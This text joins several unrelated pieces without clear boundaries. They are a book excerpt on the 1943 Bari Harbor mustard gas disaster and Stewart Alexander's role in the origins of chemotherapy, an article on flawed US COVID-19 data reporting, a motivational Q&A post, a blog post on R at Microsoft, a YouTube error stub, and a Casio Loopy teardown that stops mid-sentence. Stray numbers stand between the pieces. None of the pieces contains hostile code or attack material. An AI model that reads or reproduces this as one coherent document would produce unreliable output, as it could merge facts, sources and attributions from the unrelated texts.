He ordered samples of the harbor waters collected and analyzed. He borrowed personnel from displaced hospital units and put them to work gathering data, performing lab tests on tissue samples and compiling pathology reports. Suspecting that Laird had dodged his question, Alexander visited Navy House, the British admiralty’s local headquarters. Weary after the long day, he was blunt: Was there mustard gas in Bari Harbor? This was again “absolutely denied.” Alexander left unconvinced. What he needed was proof. But this was not the familiar menace he had studied at Edgewood. This was a new horror, “mustard gas poisoning though in a different guise than that recognized from WWI,” he wrote later. At first light, Stewart Alexander headed for the harbor. He picked his way through mounds of rubble and surveyed the twisted skeletal remains of the Allied convoys. Out on the mole, men were working like ants, removing jagged chunks of concrete and scrap metal. The port, which had been closed for five days and swept for mines, had partially reopened that morning. A number of burned-out vessels had already been towed out to sea and sunk or blown apart. A coal barge still smoldered on a quay close by, and the fly ash stung his nostrils. The dark oil-slimed water in the harbor basin looked sinister. One sailor had recalled that the floating oil had been a foot thick on the surface of the water after the raid. It was a mixture of high-octane gasoline and fuel from two dozen Allied ships and, Alexander suspected, mustard gas or a derivative, possibly dropped by the Germans among the incendiary bombs. Alexander wondered what other agents might have been thrown into the mix. The Germans possessed phosphorus and magnesium bombs, both of which would have caused deep chemical burns and eye injuries. Another possibility was that an Allied cargo ship had been carrying white phosphorus shells and smoke pots—designed to mask approaches and unnerve the enemy—which were released when the vessel was hit. If it was an aerial gas attack, determining which ships were hit and in what order would help him understand which crews suffered the most direct exposure. Even men not on the water would have inhaled significant doses of the noxious vapor as it spread across the harbor—some of it sinking, some burning, some mixing with the tons of oil floating on the surface, and some evaporating and mingling with the clouds of smoke and flame. German planes could have dropped time-fused mustard bombs that would burst open approximately 200 feet above the water or, in a low-altitude “spray attack,” could have released liquid mustard from tanks that would then have been transformed by the slipstream into tiny droplets resembling a vapor. Alexander reasoned that in either case the attack would have contaminated all the ships in the inner harbor, including the crippled vessels that remained afloat, and drenched all the men on the docks below. Yet Alexander had found no evidence of mustard contamination in his survey of the dock area. And the Royal Navy personnel he interviewed appeared shocked at the suggestion that poison gas might have been released in the air raid. “Mustard?” one British officer repeated in surprise, shaking his head. “That’s impossible. There’s no mustard here.” When he spoke with British port authorities, they continued to “state categorically that there was no mustard in the area.” Undeterred, Alexander described in detail the ghastly burns he had seen at the hospital, and he insisted there was no way those injuries could have been sustained by anything except chemical exposure. Of the 534 men admitted to the Allied hospitals following the attack, 281 were suffering from symptoms consistent with mustard poisoning. That day, 45 had died. These were just the documented cases. Many more fatalities could be expected if they did not receive proper treatment urgently. The vast majority of the victims were British—their own countrymen. The authorities began to waver. They allowed that if mustard gas was present in the harbor, “it could only have come from the German planes.” Alexander considered the ramifications of the charge that Hitler, in a desperate gamble, had risked a gas offensive. But coming as it did after a string of firm denials of so much as a whiff of mustard in Bari, it seemed to Alexander too neat an explanation. For days he pored over the clinical records. “Reading the reports,” he wrote, “is to take a journey into the nightmare of the effects of chemical contamination.” From his training, Alexander knew that agents such as mustard are toxic in vapor or liquid form when they reach the eyes, nose, lungs or gastrointestinal tract. But the chemicals can also be absorbed by the skin. And any toxic agent in contact primarily with the epidermis would, therefore, result in delayed clinical signs—as was the case with the baffling Bari victims. These were the symptoms he bore in mind as he studied the case of Seaman Philip Henry Stone, a patient who had abruptly died after asking for a drink. The doctors had pointed to him as an example of one of the inexplicable “early deaths.” The pathologist noted “a generalized dusky erythema,” or reddened skin, on the chest, abdomen and thighs, and many blisters on the face, ears, arms, back and external genitalia. “The lips were dull black in color,” he wrote. During the autopsy, the pathologist also found that the esophagus displayed a “curious black longitudinal streaking,” probably due to dead cells and tissue. The lungs, a mottled blackish-red color, were congested, the bronchi were filled with pus, and the trachea engorged with fluid. The stomach showed the same black areas, and there were necrotic areas near the opening, most likely caused by swallowing a diluted solution of mustard mixed with oil. After studying the reports, Alexander concluded that many sailors who sustained blast injuries would not have succumbed to the hemorrhages were it not for other complications: “The serious consequences of imposing the mustard vapor injury upon a lung partially damaged or bruised by blast is at once apparent.” Alexander was still trying to decide how best to proceed, given the official resistance to his diagnosis, when he received stunning news. A diver he had ordered to search the harbor floor had found fractured gas shells. Tests performed on-site revealed traces of mustard. Ordnance officers from the U.S. Air Force identified the casings as belonging to a 100-pound M47A2 mustard gas bomb. German mustard gas bombs were always marked with the distinctive Gelb Kreuz, or yellow cross. This bomb was definitely American. Alexander’s instincts were right—an Allied ship, later identified as the John Harvey, had been carrying a cargo of mustard gas. The secret shipment had most likely been destined for a chemical stockpile at Foggia, 75 miles away, in order to improve the U.S. capability to retaliate against a German chemical attack. As Alexander knew from his training, the M47 bomb was made of simple sheet metal, designed to hold white phosphorus or liquid sulfur mustard. Although the M47A2 model was coated inside with an oil to protect it from corrosion caused by the agent, the bombs were still fragile. They would have been blown to pieces in the German bombardment, releasing lethal mustard into the atmosphere and the oily harbor water. Alexander found it hard to believe that this was the first time British officials were learning of the chemical weapons. The circumstances of the accident would need further investigating, as would the extent to which the military authorities had covered up the escaped gas. By failing to alert hospital staff to the risk of contamination, they had greatly added to the number of fatalities. At that moment, however, Alexander’s patients took precedence. Now that his suspicions were confirmed, he could advise the staff at Allied hospitals on proper treatment for mustard exposure and try to reduce the number of deaths. Instead of bringing matters to a close, however, Alexander’s discovery that mustard gas had come from the Allies’ own supply had made a difficult job that much more complicated. The British port officials’ attempts to obfuscate rankled, but that paled in comparison to their effort to shift responsibility to the Luftwaffe. It was not a harmless fabrication. Alexander shuddered to think about the “grave political implications.” He later recalled thinking, “If they were going to accuse the Germans of dropping mustard when the Germans had not....” Earlier that year, President Roosevelt had issued a stern warning that any Axis use of chemical weapons would be followed by the “fullest possible retaliation.” The significance of “any error in interpreting the factor of and source of mustard gas in Bari,” Alexander recalled, “was horrendous.” If the Allied leaders drew the faulty conclusion that the enemy had deployed chemical weapons, it could trigger widespread chemical warfare. Adding to his anxiety, the daily death toll from mustard contamination, which had started to decline, suddenly spiked, demonstrating the secondary effects of pneumonia on patients already weakened by chemical exposure. There seemed no way to predict how many more men would die. Nine days after the bombing, Alexander gave his initial findings to AFHQ in Algiers. “The burns in the hospitals in this area labeled ‘dermatitis N.Y.D.’ are due to mustard gas,” he asserted. “They are unusual types and varieties because most of them are due to mustard which has been mixed into the surface oil in the harbour.” Alexander felt growing urgency that his diagnosis be recognized at the highest levels. Some British medical personnel appeared to be waiting for an official stamp of approval before implementing his treatment strategies. More important, there could be no misunderstanding the source of the mustard. He sent high-priority cables to both the American president and the British prime minister, informing them of the nature of the casualties at Bari and the almost certain origin of the gas on an American Liberty ship. Roosevelt appeared to accept his findings, and responded: “Please keep me fully informed.” Churchill, however, sent a terse reply: He did not believe there was mustard gas in Bari. Alexander was speechless. He admired Churchill, and he speculated that the British leader’s overriding concern was that the Allies “not acknowledge we had poison gas in that theater of operation because if the Germans retaliated they would be dropping poison gas on England.” There was no questioning the wisdom of this command decision, but Churchill’s opposition undermined Alexander’s credibility and ability to do his job. Alexander sent a second telegram. He cited his findings at much greater length, stating “beyond any doubt” that these casualties were due to mustard exposure. He was informed that Churchill maintained that “the symptoms do not sound like mustard gas,” which Churchill had witnessed firsthand during World War I. His instructions were the same: “The doctor should reexamine his patients.” Flummoxed, and unsure how a “lowly, lonely American medical officer” was supposed to respond, Alexander appealed to the liaison officer for advice. The man advised him: One did not argue with the prime minister. After a sleepless night, Alexander returned early to the hospital determined to prove there had been no mistake about his diagnosis. Churchill was a brilliant man, with an uncanny instinct for the salient fact, and he had put his finger on the most important question about the Bari victims: Why were the toxic effects so much more serious than any other recorded in military history? Far more patients were dying of mustard symptoms at Bari than on the battlefields of WWI, when the fatality rate had been around 2 percent. The death rate in Bari was more than six times higher—and climbing. The difference, he believed, was the amount of mustard absorbed through the skin from the unprecedented, intimate and lengthy contact as a result of being immersed in the oily harbor water, and then left to sit in soaked uniforms. “In this group of cases,” Alexander postulated, “the individuals, to all intents and purposes, were dipped into a solution of mustard-in-oil, and then wrapped in blankets, given warm tea, and allowed a prolonged period for absorption.” Alexander’s medical inquiry into mustard’s effects on the victims was just beginning. As he sat reviewing the case sheets and pathology reports, one recurring observation leapt out at him: the devastating effects on the patients’ white blood cells. He flipped through a stack of records. There it was again and again—the white blood cell counts fell off sharply. In patients who recovered, white blood cell concentrations corrected by the second or third day; but in some cases, the white blood cell count dropped precipitously beginning on the third or fourth day. He noted that lymphocytes, the white blood cells found in the lymph organs and of importance to the immune system, “were the first to disappear.” What he was looking at made the hair on the back of his neck stand on end. Alexander had seen these exact results before, but never in human beings. In March 1942, the authorities at Edgewood, having received the nitrogen mustard compounds smuggled out of Germany, turned the samples over to Alexander to investigate their impacts on the body. Alexander and his colleagues immediately began detailed experimental protocols on animals. The first studies, which recorded the effects of exposure on the skin, eyes and respiratory tracts of rabbits, showed results that were completely in line with exposure to sulfur mustard in the past and with what was expected from a highly toxic agent of this kind. Next, they set up an experiment to determine the effects on the blood and blood-forming organs. Twenty healthy rabbits were exposed to lethal doses of the agent. To the research team’s astonishment, the white blood cell count of the rabbits dropped to zero or points very close to zero. No one at the lab had ever seen such rapid destruction of white blood cells and the accompanying deterioration of lymph nodes and bone marrow. The researchers consulted the literature and found no reports of the same kind of reduction of white cells in the blood, known as leucopenia, or anything that had the same effect. Alexander’s first thought was that they must have a “bad batch of rabbits.” But when they repeated the experiment with a new group, the results were the same. Alexander ordered the tests repeated with other lab animals to rule out the possibility of poor stock or species sensitivity. They tried guinea pigs, rats, mice and goats. Each time, they achieved the same dramatic effects: sudden, severe leucopenia, severe lymphopenia, lymph node depletion and marrow depression. After exposure, the white blood cell counts rapidly disappeared, and the lymph nodes were almost completely dissolved, left as “shrunken little shells” of what they had been. While still at Edgewood, Alexander was fascinated by the idea that mustard interfered with the body’s mechanism for producing blood cells, especially white blood cells. Because of the dramatic and reproducible effects, he could not help but wonder about the possibility of using the compounds directly, or in modified forms, on human beings with diseases of the blood. If nitrogen mustard attacked white blood cells, perhaps it could be used to control leukemia, the most common type of cancer in children, with its unrestrained white blood cell growth, by using different dosages to destroy some but not all excess cells without annihilating patients. But when Alexander proposed an ambitious set of experiments into mustard’s medicinal properties, he was told first by his chief, and then, on appeal, by the National Research Council, that this was not the remit of the Edgewood laboratory. There was not enough time or money to pursue collateral lines of investigation that did not facilitate the national defense. He was ordered to put the project aside and return to his work on mustard casualty management, treatment and decontamination. Chasing miracle cures would have to wait until after the war. Now, sitting in an Allied military hospital 6,000 miles away, not even two years later, Alexander held in his hands incontrovertible evidence: “mustard gas did, in truth, selectively destroy blood cells and blood-forming organs,” he wrote. Doctors and medical researchers had never before encountered such an extraordinary level of sulfur mustard toxicity, which, when it mixed with the oil dumped into Bari Harbor, approximated the damage done by the experimental nitrogen mustard compounds—and allowed its systemic effects to be seen clearly for the first time. It had taken a freak accident, and the massive exposures of wartime, to verify in people the phenomenon demonstrated in laboratory rabbits. “It all added up to the same conditions I had seen in my prewar animal work,” Alexander later recalled. “Blood cells disappeared, and lymph nodes just melted away.” He remembered thinking, “If nitrogen mustard could do this, what could it do for a person with leukemia or lymphosarcoma?” Alexander could not save the worst of the Bari mustard gas casualties, he knew, but perhaps he could make their deaths count for something. A one-in-a-million chance had landed him, one of the few doctors in the world who had studied mustard’s curative potential, in the middle of a disaster with a morgue full of case studies. It was an unthinkably rare chance to perform a pioneering investigation into the toxin’s biological effects on the human body—the kind that would be impossible with living volunteers. He ran down the hall, yelling for more blood tests. He made sure special care was taken in preparing specimen samples to send to Edgewood for microscopic examination, and improvised a fixative solution, hoping the tissue specimens would withstand the long journey. The hematological analysis would not be as complete as he would like. The heavy burden carried by Allied combat hospitals, and the limited facilities, would prevent them from conducting important tests, including studies of bone marrow and blood chemistry. Alexander would need to be scrupulous in gathering as much data as possible, and in badgering lab technicians to do what he felt was necessary. This time, he wanted to make absolutely sure that his insight into the systemic effects of mustard was entered into the medical record, with an eye toward seeing whether the substance could be used not to destroy, but to heal. On December 27, 1943, Lt. Col. Stewart Alexander submitted his preliminary report on his ten-day investigation of the Bari Harbor catastrophe. It was immediately classified. Eisenhower and Churchill acted in concert to keep the findings secret so there was no chance Hitler could use the incident as an excuse to launch a gas offensive. Any mention of mustard gas was stricken from the official record, and the medical staff of the British hospitals in Bari were instructed to alter the patients’ charts. Alexander’s diagnosis of toxic exposure was deleted and replaced with the generic terminology for combat casualties—burns, lung complications, all other injuries and deaths “due to enemy action.” The feared German chemical attack never came. The Wehr-macht was deterred by logistical constraints, combined with Allied air superiority and the threat of massive retaliatory strikes. Ironically, the Germans had known all along about the source of the poison gas in the harbor. Nazi spies in the port had suspected that the Allies might be concealing mustard bombs among the munitions they were stockpiling in Italy. After the air strike, they sent down their own diver, an Italian frogman loyal to the Fascists, who recovered a fragment of an M47 bomb casing, which confirmed the chemical weapons were American. British officials never acknowledged Alexander’s Bari report, but it garnered high praise from Eisenhower’s senior medical advisers. They lauded the exceptional job Alexander had done under challenging conditions, but told him that a commendation was withheld for fear of “offending the Prime Minister.” Nevertheless, Col. Cornelius P. “Dusty” Rhoads, chief of the Medical Division of the Chemical Warfare Service, hailed Alexander’s meticulous investigation as so complete, and of such immense value to medicine, that it represented almost “a landmark in the history of mustard poisoning.” Rhoads was eager to explore the toxic agent’s therapeutic potential. Like Alexander, he believed the Bari data pointed the way toward a promising new chemical targeting white blood cells that could be used as a weapon in the fight against cancer. Rhoads, who in civilian life was head of New York’s Memorial Hospital for the Treatment of Cancer and Allied Diseases, seized on the wealth of new information provided by the Bari victims as a breakthrough. His ambitious plans for Memorial Hospital now converged with Alexander’s report and crystallized into a single mission—to exploit military research into poison gas to find a chemical that could selectively kill cancer cells. Armed with the Bari report, and the results of a top-secret Yale University trial that demonstrated for the first time that a regimen of intravenous nitrogen mustard—in tiny, carefully calibrated doses—could result in human tumor regression, Rhoads went in search of funding to develop this experimental treatment, known today as chemotherapy. He persuaded Alfred P. Sloan Jr., the chairman of General Motors, along with the company’s wizard engineer, Charles F. Kettering, to endow a new institute that would bring together leading scientists and physicians to make a concentrated attack on cancer. On Tuesday, August 7, 1945, the day the world learned that an atom bomb had been dropped on Japan, they announced their plans for the Sloan Kettering Institute for Cancer Research. World War II was over, but the war on cancer had just been launched. The official secrecy surrounding the Bari disaster continued for decades. The military refused to acknowledge the chronic effects of mustard exposure on hundreds of surviving sailors, naval personnel and civilians, resulting in years of suffering, controversy and lawsuits for medical compensation in both the United States and Britain. In 1961, Alexander volunteered to help the National Academy of Sciences conduct a study of the American survivors, but the project stalled when identifying victims of contamination proved too difficult. “All the records said ‘burns due to enemy action,’” recalled Alexander. Alexander was discharged from the Chemical Warfare Service in June 1945, and returned home with a chest full of medals and battle ribbons, as well as a new bride, Lt. Col. Bernice “Bunny” Wilbur, the highest-ranking Army nurse in the Mediterranean Theater. He turned down Rhoads’ offer to work at the fledgling Sloan Kettering Institute. Instead, he kept his promise to his father to continue their family practice in Park Ridge, New Jersey, where he became a much beloved physician and cardiologist, and where he raised two daughters with Bunny. He served for 18 years as director of the Bergen Pines County Hospital, and taught at the medical schools of Columbia and New York University. He never boasted of his wartime exploits, but he always took quiet pride in his unique contribution to medicine, and did not mind that while many textbooks eventually traced the modern age of chemotherapy to the Bari disaster, the details of his investigation remained enshrouded in secrecy. He died on December 6, 1991, of a malignant melanoma—skin cancer—but not before the U.S. Army belatedly commended him, three years earlier, for his actions during the Bari episode. “Without his early diagnosis and rapid initiation of appropriate and aggressive treatment, many more lives would have been lost and the severity of injuries would have been much greater,” the commendation read. “His service to the military and civilians injured during this catastrophe reflects the finest measure of a soldier and physician.” Adapted from The Great Secret: The Classified World War II Disaster That Launched the War on Cancer , by Jennet Conant. Copyright © 2020 by Jennet Conant. Used by permission of W. W. Norton & Company, Inc. Get the latest History stories in your inbox? Click to visit our Privacy Statement. A Note to our Readers Smithsonian magazine participates in affiliate link advertising programs. If you purchase an item through these links, we receive a commission.
1
US Understanding of the Pandemic Was Shaped by Messy Data
To understand any data set, you have to understand the way its information is compiled. That’s especially true for a patchwork data set such as the one composed of U.S. COVID-19 data, which is the product of 56 smaller systems belonging to each state and territory in the country. In our year of working with COVID-19 data, we harnessed our attention on these systems and found that much of the information they produced reflected their individual structures. This reality runs parallel to the country’s biggest public-health-data challenge: The data pipelines that so deeply affected the pandemic’s trajectory were not given the decades of support—financial and otherwise—needed to perform well under pressure. Instead, a novel threat arrived, and the data response we saw was fragmented, unstandardized, and limited by constraints of the reporting systems. In this post, we’ll offer a summary of how states reported the five major COVID-19 metrics—tests, cases, deaths, hospitalizations, and recoveries—and a look at how reporting complexities shaped our understanding of the pandemic. Before the COVID-19 pandemic, the CDC had never collected comprehensive national testing data for any infectious disease in the United States. But last March, as COVID-19 began to spread throughout the country, the number of tests conducted became the most crucial data point with which to understand the pandemic. Without it, we couldn’t understand whether or where low case counts were just an artifact of inadequate testing. So, last April, the CDC partnered with the Association of Public Health Laboratories (APHL) to start the COVID-19 Electronic Laboratory Reporting Program (CELR), which would eventually collect detailed COVID-19 testing data from every state. While the federal government and APHL onboarded every state to CELR, which took just over a year, the COVID Tracking Project stepped in to compile a national testing count from state health-department websites. Like the CDC, states had never collected data at the scale the pandemic demanded, and as a result, all testing data were incomplete and unstandardized. The pandemic exposed the extent to which the United States’ crucial but chronically underfunded laboratory-data infrastructure was at the mercy of the fax machine, with much manual data failing to make it into state counts or causing distortionary effects, such as data dumps. In addition, as nontraditional settings such as schools and nursing homes started administering antigen tests, states lost sight of how many of these COVID-19 tests had been conducted—opening a hole in our understanding of U.S. testing volume as antigen testing took off in the fall. Laboratories unaccustomed to collecting demographic data failed to collect information on the race and ethnicity of many people seeking COVID-19 testing, even though federal guidance required it. Read: The black hole in America’s COVID-19 data The way states reported testing information was dictated by these difficulties they faced in collecting it, and because each state had slightly different weak spots, reporting was unstandardized. Some states reported just electronically transmitted lab results, while others reported faxed data too. Some states reported antigen tests (or early on, antibody tests) combined with PCR-test data, some separated them out, and some states didn’t report them at all. Race and ethnicity data were highly incomplete and unstandardized, impeding efforts to understand the pandemic’s disproportionate effect on Black, Latino, and Indigenous communities. Of all the inconsistencies across states, one extraordinarily daunting problem that did improve over the course of the pandemic was the variation in testing units. For much of the pandemic, some states chose (or had only the capability) to count the number of unique people tested rather than the number of tests conducted. Because individuals are likely to receive multiple tests for COVID-19 over time, states counting people rather than tests appeared to be doing much less testing than others, throwing off measures used to contextualize case counts, such as test positivity. By the end of our data collection, all but two jurisdictions had standardized counting tests rather than people—although there are still some variations within how states count tests. Only the CDC ever stood a chance at collecting testing data that were standardized across jurisdictions. But the federal government has faced its own share of problems in putting together a national testing data set. When federal testing data were first published last May, many states still had not started submitting data to CELR, leading to a data set that was highly divergent from state data because it had different sourcing. And even now, with every state onboarded to CELR, many states show persistent data-quality issues in their federally published data, which have caused continued disparities with their state-published data. Throughout the pandemic, both state and federal testing data were treated by health officials and politicians as having precision and comparability that they simply did not. State test positivity became the basis of travel ordinances and reopening decisions; federal test positivity was used to inform the federal response. Both came with scant acknowledgment of their respective data-quality problems, instead creating a din of conflicting information that damaged public trust. Testing is also the base of the data pipeline for all the other metrics: Many people sought testing for COVID-19 without visiting a clinician, meaning state health departments had to rely on labs sending them test information, without the option of getting additional data from doctors. As a result, the weakness of testing pipelines ended up impeding the collection of all other COVID-19 metrics. Cases are one of the few COVID-19 metrics for which the federal government has issued clear data standards, but the paths states took toward implementing and adhering to these standards varied greatly. These state-specific paths are important to study, because without a standardized way to define a COVID-19 case, making sound comparisons across states or producing a national summary was not always easy. Testing sits at the heart of these case-identification problems. When PCR tests aren’t available—when manufacturing is delayed, when distribution lags, when access to testing sites is limited, and when incentives to seek testing are strained—it becomes crucial to establish another way to build a count. We know that in the first months of the pandemic, probable-case-identification gaps were especially profound. The CDC’s first probable - case definition was difficult for state health departments to work with in practice, because it depended on slow processes such as contact tracing. And states were slow to start publicly reporting probable cases. As a result, early probable-case counts severely underestimated the number of people likely to have COVID-19. As states built up their testing programs, and especially as antigen tests began to be deployed as a tool for identifying probable COVID-19 cases, the data grew more and more able to capture a fuller picture of the pandemic. Still, challenges remain. Of the 56 U.S. states and territories we tracked, at least five still report confirmed case numbers only, without disclosing any information about probable cases; a handful more lump probable cases in with their confirmed case counts or don’t make case definitions clear. What’s more, because the data-reporting pipelines needed to send antigen test results to state health officials are brand new, we know that huge numbers of positive antigen test results still never appear in state case counts, just as they never make it into test counts. Like many other countries, the U.S. ended up having two different death counts for COVID-19: the slower but more definitive count released by the CDC’s National Center for Health Statistics, and a more timely one compiled from state data. At the start of the pandemic, the NCHS significantly sped up its process to release provisional death-certificate data on deaths due to COVID-19. However, because the provisional death-certificate data is charted by date of death, recent weeks display a significant taper effect that can be confusing without good documentation. And NCHS data, because it undergoes a federal review, has generally (but not always) moved slower than state counts. For a more up-to-date picture of mortality, you can turn to state data, which the CDC scraped from state dashboards to assemble its own count of COVID-19 deaths. However, at the pandemic’s worst moments, there were still more people dying of COVID-19 than most states’ death - reporting infrastructures could handle. Not only did this problem lead to lags in the data; it also caused delays in issuance of death certificates, which sometimes blocked the relatives of those who had died from receiving health-care coverage or benefits. Read: How many Americans are about to die? The CDC did not issue any guidance about how states should track COVID-19 deaths, leading to a lack of standardization in how states defined the number. Some states counted deaths of individuals who had been identified as having a case of COVID-19, some states counted individuals whose death certificates listed COVID-19, and many used a combination of the two. Generally, states seemed to choose the method that allowed them to collate numbers most quickly within the constraints of their case surveillance and death infrastructures. And though it’s a common refrain that “deaths among cases” might overcount COVID-19 deaths, states using that method ended up, on average, undercounting NCHS death-certificate data by the same amount as states using death certificates. Though these two methods ended up counting deaths at roughly the same speed and comprehensiveness, the federal government did not properly explain that states used different processes to count COVID-19 deaths. Instead, at different times, the CDC seemed conflicted about the definition of the count, saying in its data FAQ that state numbers represent deaths among cases identified according to the Council for State and Territorial Epidemiologists definition, and in a statement to us that the counts represent death-certificate data. And because states did not receive any guidance from the CDC on how to report deaths, not all states initially chose their counting methods with an eye toward speed. As a result, some had to switch to faster methods for counting deaths midway through the pandemic, causing significant confusion and sometimes public distrust when numbers abruptly changed. As with other COVID-19 metrics, definitional differences hampered hospitalization - data reporting across the country. There was little standardization in how states reported current or cumulative patients, patients with confirmed or suspected cases, and pediatric cases. Many states didn’t readily define metrics on their websites, and many hospitals simply weren’t providing data. In July, confusion grew when the Trump administration issued a sweeping order that fundamentally changed how COVID-19 hospitalization data were being compiled. In addition to reporting information to state health departments, hospitals across the country were suddenly directed to report COVID-19 numbers to the U.S. Department of Health and Human Services, which oversees the CDC, instead of reporting to the CDC directly. At first, the switch was challenged, to say the least. (We wrote about the initial effects on the data here.) But as we watched hospitalization data closely over the second half of 2020, studying it to see how it tracked with numbers we were gathering from states themselves, we saw that the new protocol had patched the places where crucial data had been missing. In fact, current hospitalization data grew to be so reliably well reported—and federal data tracked with ours so closely—that the metric became a kind of lodestar in our understanding of the pandemic. Read: America’s most reliable pandemic data are now at risk Finally, in November, we decided to remove the “cumulative hospitalization” metric from our website. We knew that data from the early months of the pandemic were drastically incomplete, and we had watched as many states’ cumulative totals sat stagnant for weeks, while their current hospitalization numbers fluctuated. Additionally, 20 states never reported cumulative hospitalizations, making the national sum a large undercount. Ultimately, we decided that reporting the cumulative number of COVID-19 patients hospitalized was helpful in theory but less so in practice, and we tried to guide our data users toward more valuable metrics, such as current hospitalization and new hospital-admissions numbers, instead. Our last of the five major metrics is one that sounds intrinsically hopeful and good, but in reality, it’s just as complicated as the others: recoveries. Unfortunately, the recoveries metric shares many of the same challenges seen across COVID-19 data—it’s poorly defined, unstandardized, not reported in every state, and difficult to fully capture when case counts grow to scales that overwhelm state health departments. What’s more, an additional layer of complexity looms over the recoveries metric, presenting a kind of philosophical dilemma. Scientists are still learning about the long-term health effects of COVID-19, even among asymptomatic cases. Declaring an individual “recovered” simply because they have avoided death can be misleading and insensitive. For all these reasons, the COVID Tracking Project stopped reporting a national summary of recovery figures in November and decided to remove state-level recovery figures from our website in January. Instead of providing figures for recoveries, we began to track and display hospital discharges for the eight states providing those data, which had a clearer, more standardized meaning across states. As we wrote about state recovery metrics, our recommendation is that state health officials carefully consider how they discuss and quantify this information, choosing metrics such as “released from isolation” or “inactive cases” over labels that imply full recovery. Over the past two months, a small crew at the COVID Tracking Project has been working to document our year of data collection, reflecting on how best to organize our project’s history so that journalists, policy makers, advocates, and the public might continue to find relevance in our work. As we pored over our research on state reporting, we congealed our findings into a set of common reporting problems that made COVID-19 data especially difficult to aggregate on a national level. States tended to differ on how they defined data, what data they made available, and how they presented what data they did publish, making it difficult to compare data across states. All of those themes come through in the reporting arcs of these five COVID-19 metrics. Read: Why the pandemic experts failed Some of these problems could have been avoided with clearer reporting guidance from the federal government; others were inevitable, given the constraints of the United States’ underfunded public-health infrastructure. But all of them tended to be poorly documented, meaning it took a great deal of excavation to uncover the sources of these problems—or even the existence of the problems themselves. These data challenges may have been readily apparent to or expected by those familiar with the contours of public-health informatics. But pandemics affect us all, and the infrastructure that responds to them is meant to protect us all, so we all deserve to understand how capable the infrastructure is. Frankly, we need to understand its limitations to navigate through a pandemic. Above and beyond any individual reporting practice, we believe that it was the lack of explanations from state governments and, most crucially, the CDC that led to misuse of data and wounded public trust. We tried our best to provide explanations where possible, and we saw transformation when we were able to get the message across to the public. Data users who were frustrated or even doubtful came to trust the numbers. Journalists reported more accurately. Hospitals could better anticipate surges. If we could make just one change to the way state and federal COVID-19 data were reported, it would be to make an open acknowledgment of the limitations of public-health-data infrastructure whenever the data is presented. And if we could make one plea for what comes next, it’s that these systems receive the investment they deserve. This article has been adapted from its original version, which can be read in full at The COVID Tracking Project.
1
Q&A Series_3
Like I warned you not to open unless you need total transformation . Because at the end of this power packed letter you will not remain the same . A. What is the best way to sieve social media's distraction from it usefulness... B. How do I become good in reading and understanding books.. this has been my probs after secondary school till now? C. Must i learn a skill I think I love? A) Use Social media as a School: Social media will keep distracting us until the end of time. You would need to use it to your advantage. First of all you need to limit the amount of time you spend on social media. (The SuperHuman Guide teaches this- DM for it) As I use my social media as a school, that means I only follow people whose content help me grow. There are lots of thrash content online and you need to take filtering who you follow. Not all Status updates is worth viewing, not all groups are worth being a part of. Keep anything that doesn't add value to you far away. If the people you follow don't challenge you to grow daily, you are yet to fully optimise your online environment. B) Try alternative forms of learning, Audio (Podcasts) or Videos can work better for you, so explore until you find your best mode of content consumption and stick to it C) All skills pay. Choose one and start perfecting it. You might have to try many before you find one to stick with. If you don't try different things you would waste time wondering what would work. Stop pondering and start exploring! A) How do someone recover from huge loss as a forex trader or even an entrepreneur? B) How can I be relentlessly consistent? C) I want to help people grow too, I feel maybe I'm not enough or something, how do I overcome? A) Keep the loss behind you and move on. I know 2persons(Ajulu & Odeyinka) who lost over two million in 2018 & 2019 respectively. They didn't die. Dwelling on the loss will keep you paralyzed and not grow . C) The best way to help people is to help yourself best. Ajulu learnt and grew in obscurity for Five years before anyone knew who Ajulu is. I don't know if you even know me self , so let's leave who I am out of this... lolz. let's move on! You have all it takes to help people, you just have to spend time refining it so you would be sure of what you are offering. Thanks for reading. Please drop your feedbacks & also share if you gained value. Till we see again. 🚀CHEERS TO GROWTH!🥂
1
R at Microsoft
[This article was first published on Revolutions , and kindly contributed to R-bloggers]. (You can report issue about the content on this page here) Want to share your content on R-bloggers? click here if you have a blog, or here if you don't. I was my great pleasure yesterday to be a presenter in the “Why R Webinar” series, on the topic R at Microsoft. In the talk (which you can watch below) I recounted the history of Microsoft's acquisition of Revolution Analytics, and the various way the Microsoft supports R: its membership of the R Consortium, integration with many products (including demos of Azure ML Service with GitHub Actions, and Azure Functions), and how Microsoft has driven adoption of R in large organizations by making R “IT approved”. Many thanks to the Why R Foundation for hosting the talk, and to everyone who asked questions and prompted a lively discussion at the end: You can also find links and resources associated with the talk, including the slides, at the GitHub repository linked below. GitHub (revodavid): R at Microsoft p R-bloggers.com offers daily e-mail updates about R news and tutorials about learning R and many other topics. Click here if you're looking to post or find an R/data-science job. Want to share your content on R-bloggers? click here if you have a blog, or here if you don't.
47
The vision of the anointed, with Thomas Sowell (1995) [video]
Your browser isn’t supported anymore. Update it to get the best YouTube experience and our latest features. Learn more
132
Isn't she just Misunderstood? The Casio Loopy
Imagine asking Julius Caesar to review the arcade game Galaga. He lacks the knowledge of space that even children have today, and certainly can’t recognize a spaceship; he keeps going on about how using arrows against bugs is a waste of a perfectly good arrow. Even the high score concept is foreign to a man who doesn’t know about the modern arabic numerals, and anyway, he gets way too interested when you happen to mention a CRT monitor’s discharge could kill a man. Would you really learn anything useful about Galaga from his review? And what is the point of this thought? Nothing, totally irrelevant. Let’s talk about the Casio Loopy! Casio is of course a big name in electronics, but they’ve not shown up on this blog at all before. They made some MSX computers, and the Casio PV-1000 and PV-2000 consoles in the early 80’s, but the Loopy has pretty much nothing to do with those. The Casio Loopy is a 32-bit machine with a SuperH CPU, released in 1995. This family of CPUs is probably more famous for its use by Sega, but the SH7201 used in the Loopy appears to be still in production by Renesas. I’m not sure how much the SH7201 has changed over that time; it seems to be an SH-1 system, as opposed to the SH-2 used in the 32X and Saturn, and the SH-4 used in the Dreamcast. The Casio Loopy’s controller is a pretty simple affair; amusingly, the layout may be better for Neo Geo games than SNK’s own Neo Geo CD pad, with the face buttons laid out in a semicircle. But sadly you wouldn’t want to play King of Fighters ‘97 on this; the buttons don’t feel great, with very little travel. For the Loopy, though, they get the job done and it’s comfortable in the hand. The system has just one controller slot. This slot on the front is where the printer outputs. The printer is, as we’ll see, kind of the whole point of the Loopy. The printer prints small stickers, or as the console calls them, “seals”. So, let’s take this girl apart. It’s just held together by cross-head screws on the bottom; somewhat oddly, as the cartridges do use the infamous “Gamebit” security screws. Inside we see that only a single LED is connected to the top now. In the bottom, we see two circuit boards, and the printer mechanism. Notice that the button with scissors on it controls a small bit of scissors that is completely internal to the console, so that there’s no risk of a child cutting themselves. That’s used 